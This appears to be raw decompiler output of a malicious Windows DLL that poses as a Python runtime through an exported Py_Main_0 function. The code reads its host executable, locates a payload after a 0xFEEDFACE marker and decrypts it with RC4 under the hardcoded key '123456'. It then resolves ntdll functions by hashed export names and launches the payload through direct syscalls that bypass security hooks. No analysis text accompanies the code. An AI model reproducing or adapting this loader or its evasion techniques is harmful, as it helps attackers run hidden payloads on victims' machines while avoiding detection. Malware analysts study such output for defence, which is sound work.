/* This file was generated by the Hex-Rays decompiler version 9.0.0.241217.
   Copyright (c) 2007-2021 Hex-Rays <info@hex-rays.com>

   Detected compiler: Visual C++
*/

#include <windows.h>
#include <defs.h>


//-------------------------------------------------------------------------
// Function declarations

#define __thiscall __cdecl // Test compile in C mode

char __fastcall sub_10001000(int a1, int a2, int a3, int a4, _BYTE *a5);
_BYTE *Py_Main_0();
BOOL __stdcall DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved);
void *sub_100012A4();
BOOL sub_100012AB();
int sub_100012C1();
int __cdecl sub_10001469(int a1);
void sub_100014A0();
void sub_100014F0();
void sub_100014F5();
void sub_10001545();
void sub_1000154A();
void sub_1000159A();
void *__cdecl sub_100015AD(size_t a1);
BOOL __cdecl sub_10001710(int a1);
// void *__cdecl operator new(size_t Size); idb
unsigned int sub_10001A6A();
void sub_10001B02();
int sub_10001B0E();
void *sub_10001B1A();
void *sub_10001B20();
int __cdecl sub_10001B43(int a1, unsigned int a2);
// int __scrt_acquire_startup_lock(void); weak
char sub_10001BF0();
char sub_10001C0F();
// int __scrt_dllmain_uninitialize_c(void); weak
char sub_10001C73();
// _DWORD __cdecl __scrt_release_startup_lock(char); weak
// _DWORD __cdecl __scrt_uninitialize_crt(_DWORD, char); weak
void *sub_10001E19();
// _DWORD __cdecl __scrt_fastfail(_DWORD); weak
void sub_10001F34();
void sub_10001F3C();
void sub_10001F68();
std::exception *__thiscall sub_10002017(std::exception *this, struct std::exception *a2);
_DWORD *__thiscall sub_10002032(_DWORD *this);
std::exception *__thiscall sub_1000204A(std::exception *this, struct std::exception *a2);
_DWORD *__thiscall sub_10002065(_DWORD *this);
// _DWORD __thiscall std::exception::exception(std::exception *__hidden this, const struct std::exception *); idb
void __noreturn sub_100020E7(); // weak
void __noreturn sub_10002104(); // weak
const char *__thiscall sub_10002121(_DWORD *this);
int sub_1000212F();
int sub_1000245C();
void __cdecl sub_1000246C(void *Block);
_DWORD *__thiscall sub_1000247A(_DWORD *Block, char a2);
void __cdecl j_free(void *Block);
// int __cdecl _std_type_info_destroy_list(_DWORD); weak
// void __stdcall __noreturn CxxThrowException(void *pExceptionObject, _ThrowInfo *pThrowInfo);
char sub_10002508();
int sub_1000250B();
int __cdecl sub_1000250E(int a1);
// void *__cdecl memcpy(void *, const void *Src, size_t Size);

//-------------------------------------------------------------------------
// Data declarations

// extern BOOL (__stdcall *ReadFile)(HANDLE hFile, LPVOID lpBuffer, DWORD nNumberOfBytesToRead, LPDWORD lpNumberOfBytesRead, LPOVERLAPPED lpOverlapped);
// extern DWORD (__stdcall *GetModuleFileNameA)(HMODULE hModule, LPSTR lpFilename, DWORD nSize);
// extern HANDLE (__stdcall *GetCurrentProcess)();
// extern DWORD (__stdcall *WaitForSingleObject)(HANDLE hHandle, DWORD dwMilliseconds);
// extern HANDLE (__stdcall *CreateFileA)(LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile);
// extern DWORD (__stdcall *GetFileSize)(HANDLE hFile, LPDWORD lpFileSizeHigh);
// extern BOOL (__stdcall *IsProcessorFeaturePresent)(DWORD ProcessorFeature);
// extern BOOL (__stdcall *QueryPerformanceCounter)(LARGE_INTEGER *lpPerformanceCount);
// extern DWORD (__stdcall *GetCurrentProcessId)();
// extern DWORD (__stdcall *GetCurrentThreadId)();
// extern void (__stdcall *GetSystemTimeAsFileTime)(LPFILETIME lpSystemTimeAsFileTime);
// extern void (__stdcall *InitializeSListHead)(PSLIST_HEADER ListHead);
// extern void *(__cdecl *malloc)(size_t Size);
void *std::bad_alloc::`vftable' = &unknown_libname_2; // weak
void *std::bad_array_new_length::`vftable' = &unknown_libname_2; // weak
void *type_info::`vftable' = &sub_1000247A; // weak
const _ThrowInfo _TI2_AVbad_alloc_std__ = { 0u, &unknown_libname_1, NULL, &_CTA2_AVbad_alloc_std__ }; // idb
const _ThrowInfo _TI3_AVbad_array_new_length_std__ = { 0u, &unknown_libname_1, NULL, &_CTA3_AVbad_array_new_length_std__ }; // idb
int dword_10004050 = -1; // weak
int dword_10004054 = -1; // weak
int dword_10004058 = 1; // weak
int dword_100040E0 = 0; // weak
union _SLIST_HEADER ListHead; // idb
_UNKNOWN unk_10004410; // weak
_UNKNOWN unk_10004418; // weak
int dword_10004420; // weak
int dword_10004444; // weak
int dword_10004448; // weak
int dword_1000444C; // weak
int dword_10004450; // weak
_UNKNOWN unk_10004454; // weak
int dword_10004460; // weak
int dword_10004464[]; // weak
int dword_10004468[]; // weak
int dword_1000446C[]; // weak


//----- (10001000) --------------------------------------------------------
char __fastcall sub_10001000(int a1, int a2, int a3, int a4, _BYTE *a5)
{
  int v5; // esi
  int v6; // ebx
  int i; // ecx
  int j; // edi
  unsigned __int8 v9; // dl
  char result; // al
  int v11; // edi
  _BYTE *v12; // edx
  int v13; // ebx
  unsigned __int8 v14; // cl
  char v15; // al
  _BYTE v16[512]; // [esp+Ch] [ebp-208h]
  int v17; // [esp+20Ch] [ebp-8h]
  int v18; // [esp+210h] [ebp-4h]

  v5 = 0;
  v17 = a1;
  v6 = 0;
  v18 = a2;
  for ( i = 0; i < 256; ++i )
  {
    v16[i + 256] = i;
    v16[i] = *(_BYTE *)(i % a4 + a3);
  }
  for ( j = 0; j < 256; ++j )
  {
    v9 = v16[j + 256];
    v6 = (v9 + (unsigned __int8)v16[j] + v6) % 256;
    result = v16[v6 + 256];
    v16[v6 + 256] = v9;
    v16[j + 256] = result;
  }
  v11 = 0;
  if ( v18 > 0 )
  {
    v12 = a5;
    v13 = v17 - (_DWORD)a5;
    do
    {
      v5 = (v5 + 1) % 256;
      v14 = v16[v5 + 256];
      v11 = (v14 + v11) % 256;
      v15 = v16[v11 + 256];
      v16[v11 + 256] = v14;
      v16[v5 + 256] = v15;
      result = v12[v13] ^ v16[(unsigned __int8)(v15 + v16[v11 + 256]) + 256];
      *v12++ = result;
      --v18;
    }
    while ( v18 );
  }
  return result;
}

//----- (100010FA) --------------------------------------------------------
_BYTE *Py_Main_0()
{
  _BYTE *result; // eax
  void *v1; // ebx
  size_t FileSize; // esi
  _DWORD *v3; // edi
  int v4; // ecx
  unsigned int v5; // edx
  char *v6; // ebx
  unsigned int v7; // ecx
  unsigned int v8; // esi
  _BYTE *v9; // edi
  HANDLE hHandle; // [esp+Ch] [ebp-120h]
  size_t Size; // [esp+14h] [ebp-118h]
  DWORD NumberOfBytesRead; // [esp+18h] [ebp-114h] BYREF
  CHAR Filename[260]; // [esp+1Ch] [ebp-110h] BYREF
  char v14[8]; // [esp+120h] [ebp-Ch] BYREF

  strcpy(v14, "123456");
  GetModuleFileNameA(0, Filename, 0x104u);
  result = CreateFileA(Filename, 0x80000000, 1u, 0, 3u, 0x80u, 0);
  v1 = result;
  if ( result != (_BYTE *)-1 )
  {
    FileSize = GetFileSize(result, 0);
    v3 = sub_100015AD(FileSize);
    result = (_BYTE *)ReadFile(v1, v3, FileSize, &NumberOfBytesRead, 0);
    v4 = v3[15];
    v5 = *(_DWORD *)((char *)v3 + v4 + 156);
    v6 = (char *)v3 + *(_DWORD *)((char *)v3 + v4 + 152);
    v7 = 0;
    if ( v5 )
    {
      result = v6 + 2;
      while ( *(result - 2) != 0xFE || *(result - 1) != 0xED || *result != 0xFA || result[1] != 0xCE )
      {
        ++v7;
        ++result;
        if ( v7 >= v5 )
          return result;
      }
      v8 = v7 + 8;
      if ( v7 != -8 )
      {
        Size = v5 - v8;
        v9 = malloc(v5 - v8);
        memcpy(v9, &v6[v8], Size);
        sub_10001000((int)v9, Size, (int)v14, strlen(v14), v9);
        sub_100014A0();
        GetCurrentProcess();
        sub_100014F5();
        GetCurrentProcess();
        sub_1000154A();
        return (_BYTE *)WaitForSingleObject(hHandle, 0xFFFFFFFF);
      }
    }
  }
  return result;
}
// 10001284: variable 'hHandle' is possibly undefined

//----- (10001299) --------------------------------------------------------
BOOL __stdcall DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
  return 1;
}

//----- (100012A4) --------------------------------------------------------
void *sub_100012A4()
{
  return NtCurrentTeb()->WOW32Reserved;
}

//----- (100012AB) --------------------------------------------------------
BOOL sub_100012AB()
{
  return NtCurrentTeb()->WOW32Reserved != 0;
}

//----- (100012C1) --------------------------------------------------------
int sub_100012C1()
{
  _DWORD *v0; // edx
  struct _LIST_ENTRY *Flink; // ecx
  struct _LIST_ENTRY *v2; // eax
  struct _LIST_ENTRY *v3; // edi
  int v4; // eax
  int v5; // esi
  int v6; // ebx
  int v7; // ecx
  int v8; // eax
  int v9; // edx
  int v10; // eax
  _DWORD *v11; // esi
  int v12; // ebx
  _WORD *v13; // esi
  unsigned __int16 *v14; // ecx
  int v15; // eax
  int v16; // edi
  int v17; // eax
  int v18; // eax
  unsigned int v19; // esi
  unsigned int v20; // ecx
  unsigned int v21; // ebx
  int *v22; // edi
  int *v23; // eax
  int v24; // edx
  int v25; // ecx
  int v27; // [esp+Ch] [ebp-18h]
  struct _LIST_ENTRY *v28; // [esp+10h] [ebp-14h]
  _DWORD *v29; // [esp+14h] [ebp-10h]
  unsigned int v30; // [esp+14h] [ebp-10h]
  int v31; // [esp+18h] [ebp-Ch]
  unsigned int v32; // [esp+18h] [ebp-Ch]
  int v33; // [esp+1Ch] [ebp-8h]
  int v34; // [esp+20h] [ebp-4h]

  if ( dword_10004460 )
    return 1;
  v0 = 0;
  Flink = NtCurrentPeb()->Ldr->InLoadOrderModuleList.Flink;
  v2 = Flink[3].Flink;
  if ( !v2 )
    return 0;
  do
  {
    v3 = v2;
    v28 = v2;
    v4 = *(int *)((char *)&v2[7].Blink[15].Flink + (unsigned int)v2);
    if ( v4 )
    {
      v0 = (struct _LIST_ENTRY **)((char *)&v3->Flink + v4);
      v5 = *(int *)((char *)&v3[1].Blink + v4);
      if ( (*(int *)((char *)&v3->Flink + v5) | 0x20202020) == 0x6C64746E
        && (*(int *)((char *)&v3->Blink + v5) | 0x20202020) == 0x6C642E6C )
      {
        break;
      }
    }
    Flink = Flink->Flink;
    v2 = Flink[3].Flink;
  }
  while ( v2 );
  if ( !v0 )
    return 0;
  v6 = v0[6];
  v27 = (int)v3 + v0[7];
  v7 = (int)v3 + v0[8];
  v8 = v0[9];
  v9 = 0;
  v33 = v6;
  v31 = (int)v3 + 2 * v6 + v8 - 2;
  v10 = v6;
  v11 = (_DWORD *)(v7 + 4 * (v6 - 1));
  v12 = 0;
  v29 = v11;
  while ( 1 )
  {
    v13 = (_WORD *)((char *)v3 + *v11);
    v14 = (unsigned __int16 *)v31;
    if ( *v13 == 30554 )
      break;
LABEL_16:
    --v10;
    v11 = v29 - 1;
    v33 = v10;
    --v29;
    v31 = (int)(v14 - 1);
    if ( !v10 )
      goto LABEL_17;
  }
  v15 = -1321229194;
  if ( *(_BYTE *)v13 )
  {
    v16 = -1321229194;
    do
    {
      v17 = (unsigned __int16)*v13;
      v13 = (_WORD *)((char *)v13 + 1);
      v16 ^= v17 + __ROR4__(v16, 8);
    }
    while ( *(_BYTE *)v13 );
    v14 = (unsigned __int16 *)v31;
    v34 = v16;
    v3 = v28;
    v15 = v34;
  }
  dword_10004464[v12] = v15;
  v18 = *(_DWORD *)(v27 + 4 * *v14);
  dword_1000446C[v12] = 0;
  ++v9;
  dword_10004468[v12] = v18;
  v12 += 3;
  if ( v12 != 1800 )
  {
    v10 = v33;
    goto LABEL_16;
  }
LABEL_17:
  dword_10004460 = v9;
  v19 = 0;
  if ( v9 != 1 )
  {
    do
    {
      v20 = 0;
      v32 = 0;
      if ( v9 - v19 != 1 )
      {
        v21 = dword_10004468[0];
        v22 = dword_10004468;
        do
        {
          v23 = v22 + 3;
          v30 = v21;
          v21 = v22[3];
          if ( v30 > v21 )
          {
            v24 = *(v22 - 1);
            v25 = v22[1];
            *(v22 - 1) = v22[2];
            v22[1] = v22[4];
            v23 = v22 + 3;
            v22[2] = v24;
            *v22 = v21;
            v21 = v30;
            v22[4] = v25;
            v20 = v32;
            v22[3] = v30;
            v9 = dword_10004460;
          }
          v22 = v23;
          v32 = ++v20;
        }
        while ( v20 < v9 - v19 - 1 );
      }
      ++v19;
    }
    while ( v19 < v9 - 1 );
  }
  return 1;
}
// 10004460: using guessed type int dword_10004460;
// 10004464: using guessed type int dword_10004464[];
// 10004468: using guessed type int dword_10004468[];
// 1000446C: using guessed type int dword_1000446C[];

//----- (10001469) --------------------------------------------------------
int __cdecl sub_10001469(int a1)
{
  int result; // eax
  int *i; // ecx

  if ( !sub_100012C1() )
    return -1;
  result = 0;
  if ( !dword_10004460 )
    return -1;
  for ( i = dword_10004464; a1 != *i; i += 3 )
  {
    if ( ++result >= (unsigned int)dword_10004460 )
      return -1;
  }
  return result;
}
// 10004460: using guessed type int dword_10004460;
// 10004464: using guessed type int dword_10004464[];

//----- (100014A0) --------------------------------------------------------
void sub_100014A0()
{
  int v0; // ecx
  void *v1; // kr00_4

  sub_10001469(261165319);
  v0 = 6;
  do
    --v0;
  while ( v0 );
  if ( sub_100012AB() )
  {
    v1 = sub_100012A4();
    __asm { jmp     ecx }
  }
  sub_100014F0();
}

//----- (100014F0) --------------------------------------------------------
void sub_100014F0()
{
  __asm { sysenter }
}

//----- (100014F5) --------------------------------------------------------
void sub_100014F5()
{
  int v0; // ecx
  void *v1; // kr00_4

  sub_10001469(93662019);
  v0 = 5;
  do
    --v0;
  while ( v0 );
  if ( sub_100012AB() )
  {
    v1 = sub_100012A4();
    __asm { jmp     ecx }
  }
  sub_10001545();
}

//----- (10001545) --------------------------------------------------------
void sub_10001545()
{
  __asm { sysenter }
}

//----- (1000154A) --------------------------------------------------------
void sub_1000154A()
{
  int v0; // ecx
  void *v1; // kr00_4

  sub_10001469(-399361175);
  v0 = 11;
  do
    --v0;
  while ( v0 );
  if ( sub_100012AB() )
  {
    v1 = sub_100012A4();
    __asm { jmp     ecx }
  }
  sub_1000159A();
}

//----- (1000159A) --------------------------------------------------------
void sub_1000159A()
{
  __asm { sysenter }
}

//----- (100015AD) --------------------------------------------------------
void *__cdecl sub_100015AD(size_t a1)
{
  return operator new(a1);
}

//----- (10001710) --------------------------------------------------------
BOOL __cdecl sub_10001710(int a1)
{
  BOOL v2; // esi
  char v3; // [esp+10h] [ebp-20h]

  if ( dword_100040E0 <= 0 )
    return 0;
  --dword_100040E0;
  v3 = __scrt_acquire_startup_lock();
  if ( dword_10004420 != 2 )
  {
    __scrt_fastfail(7);
    __debugbreak();
  }
  __scrt_dllmain_uninitialize_c();
  sub_10001B0E();
  sub_10001F68();
  dword_10004420 = 0;
  __scrt_release_startup_lock(v3);
  v2 = (unsigned __int8)__scrt_uninitialize_crt(a1, 0) != 0;
  sub_10001C73();
  return v2;
}
// 10001B85: using guessed type int __scrt_acquire_startup_lock(void);
// 10001C50: using guessed type int __scrt_dllmain_uninitialize_c(void);
// 10001DD4: using guessed type _DWORD __cdecl __scrt_release_startup_lock(char);
// 10001DF1: using guessed type _DWORD __cdecl __scrt_uninitialize_crt(_DWORD, char);
// 10001E1F: using guessed type _DWORD __cdecl __scrt_fastfail(_DWORD);
// 100040E0: using guessed type int dword_100040E0;
// 10004420: using guessed type int dword_10004420;

//----- (10001A6A) --------------------------------------------------------
unsigned int sub_10001A6A()
{
  LARGE_INTEGER PerformanceCount; // [esp+0h] [ebp-14h] BYREF
  _FILETIME SystemTimeAsFileTime; // [esp+8h] [ebp-Ch] BYREF
  DWORD v3; // [esp+10h] [ebp-4h] BYREF

  SystemTimeAsFileTime = 0LL;
  GetSystemTimeAsFileTime(&SystemTimeAsFileTime);
  v3 = SystemTimeAsFileTime.dwLowDateTime ^ SystemTimeAsFileTime.dwHighDateTime;
  v3 ^= GetCurrentThreadId();
  v3 ^= GetCurrentProcessId();
  QueryPerformanceCounter(&PerformanceCount);
  return (unsigned int)&v3 ^ v3 ^ PerformanceCount.LowPart ^ PerformanceCount.HighPart;
}
// 10001AB3: returning address of temporary local variable '%var_4'

//----- (10001B02) --------------------------------------------------------
void sub_10001B02()
{
  InitializeSListHead(&ListHead);
}

//----- (10001B0E) --------------------------------------------------------
int sub_10001B0E()
{
  return _std_type_info_destroy_list(&ListHead);
}
// 100024A2: using guessed type int __cdecl _std_type_info_destroy_list(_DWORD);

//----- (10001B1A) --------------------------------------------------------
void *sub_10001B1A()
{
  return &unk_10004410;
}

//----- (10001B20) --------------------------------------------------------
void *sub_10001B20()
{
  return &unk_10004418;
}

//----- (10001B43) --------------------------------------------------------
int __cdecl sub_10001B43(int a1, unsigned int a2)
{
  int v2; // ecx
  int v3; // edx
  int v4; // esi
  unsigned int v5; // ecx

  v2 = a1 + *(_DWORD *)(a1 + 60);
  v3 = *(unsigned __int16 *)(v2 + 20) + v2 + 24;
  v4 = v3 + 40 * *(unsigned __int16 *)(v2 + 6);
  while ( 1 )
  {
    if ( v3 == v4 )
      return 0;
    v5 = *(_DWORD *)(v3 + 12);
    if ( a2 >= v5 && a2 < v5 + *(_DWORD *)(v3 + 8) )
      break;
    v3 += 40;
  }
  return v3;
}

//----- (10001BF0) --------------------------------------------------------
char sub_10001BF0()
{
  if ( !sub_10002508() )
    return 0;
  if ( !sub_10002508() )
  {
    sub_10002508();
    return 0;
  }
  return 1;
}

//----- (10001C0F) --------------------------------------------------------
char sub_10001C0F()
{
  sub_10002508();
  sub_10002508();
  return 1;
}

//----- (10001C73) --------------------------------------------------------
char sub_10001C73()
{
  sub_10002508();
  return sub_10002508();
}

//----- (10001E19) --------------------------------------------------------
void *sub_10001E19()
{
  return &unk_10004454;
}

//----- (10001F34) --------------------------------------------------------
void sub_10001F34()
{
  dword_10004444 = 0;
}
// 10004444: using guessed type int dword_10004444;

//----- (10001F3C) --------------------------------------------------------
void sub_10001F3C()
{
  ;
}
// 10001F3C: could not find valid save-restore pair for edi

//----- (10001F68) --------------------------------------------------------
void sub_10001F68()
{
  ;
}
// 10001F68: could not find valid save-restore pair for edi

//----- (10002017) --------------------------------------------------------
std::exception *__thiscall sub_10002017(std::exception *this, struct std::exception *a2)
{
  std::exception::exception(this, a2);
  *(_DWORD *)this = &std::bad_alloc::`vftable';
  return this;
}
// 100030F0: using guessed type void *std::bad_alloc::`vftable';

//----- (10002032) --------------------------------------------------------
_DWORD *__thiscall sub_10002032(_DWORD *this)
{
  _DWORD *result; // eax

  this[1] = 0;
  result = this;
  this[2] = 0;
  this[1] = "bad allocation";
  *this = &std::bad_alloc::`vftable';
  return result;
}
// 100030F0: using guessed type void *std::bad_alloc::`vftable';

//----- (1000204A) --------------------------------------------------------
std::exception *__thiscall sub_1000204A(std::exception *this, struct std::exception *a2)
{
  std::exception::exception(this, a2);
  *(_DWORD *)this = &std::bad_array_new_length::`vftable';
  return this;
}
// 1000310C: using guessed type void *std::bad_array_new_length::`vftable';

//----- (10002065) --------------------------------------------------------
_DWORD *__thiscall sub_10002065(_DWORD *this)
{
  _DWORD *result; // eax

  this[1] = 0;
  result = this;
  this[2] = 0;
  this[1] = "bad array new length";
  *this = &std::bad_array_new_length::`vftable';
  return result;
}
// 1000310C: using guessed type void *std::bad_array_new_length::`vftable';

//----- (100020E7) --------------------------------------------------------
void __noreturn sub_100020E7()
{
  _DWORD pExceptionObject[3]; // [esp+0h] [ebp-Ch] BYREF

  sub_10002032(pExceptionObject);
  CxxThrowException(pExceptionObject, (_ThrowInfo *)&_TI2_AVbad_alloc_std__);
}
// 100020E7: using guessed type void __noreturn sub_100020E7();

//----- (10002104) --------------------------------------------------------
void __noreturn sub_10002104()
{
  _DWORD pExceptionObject[3]; // [esp+0h] [ebp-Ch] BYREF

  sub_10002065(pExceptionObject);
  CxxThrowException(pExceptionObject, (_ThrowInfo *)&_TI3_AVbad_array_new_length_std__);
}
// 10002104: using guessed type void __noreturn sub_10002104();

//----- (10002121) --------------------------------------------------------
const char *__thiscall sub_10002121(_DWORD *this)
{
  const char *result; // eax

  result = "Unknown exception";
  if ( this[1] )
    return (const char *)this[1];
  return result;
}

//----- (1000212F) --------------------------------------------------------
int sub_1000212F()
{
  int v5; // edi
  int v11; // eax
  int v12; // edx
  unsigned int v14; // edi
  unsigned int v29; // esi
  int v30; // eax
  unsigned int v31; // ecx
  int v32; // eax
  int v33; // eax
  int v34; // ecx
  unsigned int v35; // eax
  int v36; // edi
  int v38; // [esp+0h] [ebp-28h]
  int v39; // [esp+10h] [ebp-18h]
  int v40; // [esp+10h] [ebp-18h]
  int v41; // [esp+14h] [ebp-14h]
  int v42; // [esp+14h] [ebp-14h]
  char v43; // [esp+18h] [ebp-10h]
  int v44; // [esp+1Ch] [ebp-Ch]
  int v45; // [esp+20h] [ebp-8h]
  int v46; // [esp+24h] [ebp-4h]

  dword_1000444C = 0;
  dword_10004058 |= 1u;
  if ( IsProcessorFeaturePresent(0xAu) )
  {
    _EAX = 0;
    __asm { cpuid }
    v46 = _EAX;
    v5 = _EBX ^ 0x756E6547;
    v39 = _EDX ^ 0x49656E69;
    v41 = _ECX ^ 0x6C65746E;
    _EAX = 1;
    __asm { cpuid }
    v38 = _EAX;
    if ( !(v5 | v41 | v39) )
    {
      v11 = _EAX & 0xFFF3FF0;
      if ( (v38 & 0xFFF3FF0) == 0x106C0
        || v11 == 132704
        || v11 == 132720
        || v11 == 198224
        || v11 == 198240
        || v11 == 198256 )
      {
        dword_10004450 |= 1u;
      }
    }
    v12 = _ECX;
    _EBX = 0;
    v42 = 0;
    v14 = 0;
    v40 = 0;
    v44 = _ECX;
    if ( v46 >= 7 )
    {
      _EAX = 7;
      __asm { cpuid }
      v45 = _EBX;
      v42 = _EDX;
      if ( (_EBX & 0x200) != 0 )
        dword_10004450 |= 2u;
      if ( _EAX >= 1 )
      {
        _EAX = 7;
        __asm { cpuid }
        _EBX = v45;
        v40 = _EDX;
      }
      _EAX = 36;
      if ( v46 >= 36 )
      {
        __asm { cpuid }
        v29 = _EBX;
        _EBX = v45;
        v14 = v29;
      }
      v12 = v44;
    }
    v30 = dword_10004058 | 2;
    v31 = dword_10004050 & 0xFFFFFFFE;
    dword_1000444C = 1;
    dword_10004058 |= 2u;
    dword_10004050 &= ~1u;
    if ( (v12 & 0x100000) != 0 )
    {
      v32 = v30 | 4;
      dword_1000444C = 2;
      dword_10004058 = v32;
      dword_10004050 = v31 & 0xFFFFFFEF;
      if ( (v12 & 0x8000000) != 0 && (v12 & 0x10000000) != 0 )
      {
        __asm { xgetbv }
        v43 = v32;
        if ( (v32 & 6) == 6 )
        {
          v33 = dword_10004058 | 8;
          dword_1000444C = 3;
          dword_10004058 |= 8u;
          if ( (_EBX & 0x20) != 0 )
          {
            v34 = dword_10004054;
            dword_10004058 = v33 | 0x20;
            v35 = dword_10004050 & 0xFFFFFFFD;
            dword_1000444C = 5;
            dword_10004050 &= ~2u;
            if ( (_EBX & 0xD0030000) != 0xD0030000 )
            {
LABEL_27:
              if ( (v42 & 0x800000) != 0 )
              {
                dword_10004054 = v34;
                dword_10004050 = v35 & 0xFEFFFFFF;
              }
              if ( (v40 & 0x80000) != 0 && (v43 & 0xE0) == 0xE0 )
              {
                dword_10004448 = v14 & 0x400FF;
                v36 = dword_10004050 & ~(HIWORD(v14) & 7 | 0x1000028);
                dword_10004050 = v36;
                if ( (unsigned int)dword_10004448 > 1 )
                  dword_10004050 = v36 & 0xFFFFFFBF;
              }
              return 0;
            }
            if ( (v43 & 0xE0) == 0xE0 )
            {
              dword_10004058 |= 0x40u;
              v35 = dword_10004050 & 0xFFFFFFDB;
              v34 = dword_10004054;
              dword_1000444C = 6;
              dword_10004050 &= 0xFFFFFFDB;
              goto LABEL_27;
            }
          }
          v34 = dword_10004054;
          v35 = dword_10004050;
          goto LABEL_27;
        }
      }
    }
  }
  return 0;
}
// 1000212F: could not find valid save-restore pair for ebx
// 10002399: conditional instruction was optimized away because ecx.4==0
// 10002409: conditional instruction was optimized away because ecx.4==0
// 10004050: using guessed type int dword_10004050;
// 10004054: using guessed type int dword_10004054;
// 10004058: using guessed type int dword_10004058;
// 10004448: using guessed type int dword_10004448;
// 1000444C: using guessed type int dword_1000444C;
// 10004450: using guessed type int dword_10004450;

//----- (1000245C) --------------------------------------------------------
int sub_1000245C()
{
  return 1;
}

//----- (1000246C) --------------------------------------------------------
void __cdecl sub_1000246C(void *Block)
{
  j_free(Block);
}

//----- (1000247A) --------------------------------------------------------
_DWORD *__thiscall sub_1000247A(_DWORD *Block, char a2)
{
  *Block = &type_info::`vftable';
  if ( (a2 & 1) != 0 )
    sub_1000246C(Block);
  return Block;
}
// 10003130: using guessed type void *type_info::`vftable';

//----- (10002508) --------------------------------------------------------
char sub_10002508()
{
  return 1;
}

//----- (1000250B) --------------------------------------------------------
int sub_1000250B()
{
  return 0;
}

//----- (1000250E) --------------------------------------------------------
int __cdecl sub_1000250E(int a1)
{
  int v1; // ecx
  unsigned __int16 v3; // [esp+0h] [ebp-4h]

  v1 = a1;
  if ( dword_1000444C < 1 || a1 != -1073741132 && a1 != -1073741131 )
    return v1;
  v3 = _mm_getcsr();
  if ( (((unsigned __int8)v3 ^ 0x3F) & 0x81) != 0 )
  {
    if ( ((v3 ^ 0x3F) & 0x204) == 0 )
      return -1073741682;
    if ( ((v3 ^ 0x3F) & 0x102) != 0 )
    {
      if ( ((v3 ^ 0x3F) & 0x408) == 0 )
        return -1073741679;
      if ( ((v3 ^ 0x3F) & 0x810) == 0 )
        return -1073741677;
      if ( ((v3 ^ 0x3F) & 0x1020) == 0 )
        return -1073741681;
      return v1;
    }
  }
  return -1073741680;
}
// 1000444C: using guessed type int dword_1000444C;

// nfuncs=90 queued=42 decompiled=42 lumina nreq=0 worse=0 better=0
// ALL OK, 42 function(s) have been successfully decompiled
